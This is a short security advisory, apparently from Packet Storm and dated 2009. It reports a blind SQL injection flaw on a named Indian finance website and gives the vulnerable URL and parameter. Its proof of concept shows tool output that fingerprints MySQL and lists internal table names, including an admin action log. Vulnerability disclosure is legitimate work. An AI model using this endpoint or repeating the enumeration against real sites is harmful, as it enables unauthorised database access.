moneycontrol.com, a well known finance screener in India, suffers from a remote blind SQL injection vulnerability.
9c1cd8b331cee84b582fc88547729bdb80b81fadad7103982bc33613d29c8cd4=============================================================================
Website: https://moneycontrol.com/
Category: India's one of the biggest finance screener [stock market ]
Vulnerability: Blind SQL Injection
Founder: Jaydeep Dave [jaydipdave@gmail.com]
Date: 16th Feb, 2009
=============================================================================
== P O C ====================================================================
[+] URL: https://wealth.moneycontrol.com/article.php?id=9791
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[+] MySQL >= v5.0.0 found!
[+] Showing Tables from database "bsmart"
[+] Number of Tables: 96
[0]: admin_action_log
[1]: askexpert
[2]: author
[3]: authorsource
[4]: authortype
[5]: autoloan
[6]: bankfdsfinal
[7]: blogcomments
[8]: blogcontent
[9]: blograting
[10]: blogreadtrack
[11]: blogusers
[12]: boxmanagement
[13]: calculators
[14]: chat
[15]: cmslog
[16]: cobrandedcard
[17]: commentfilters
[18]: comments
[19]: communitiescategory
....
=============================================================================
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed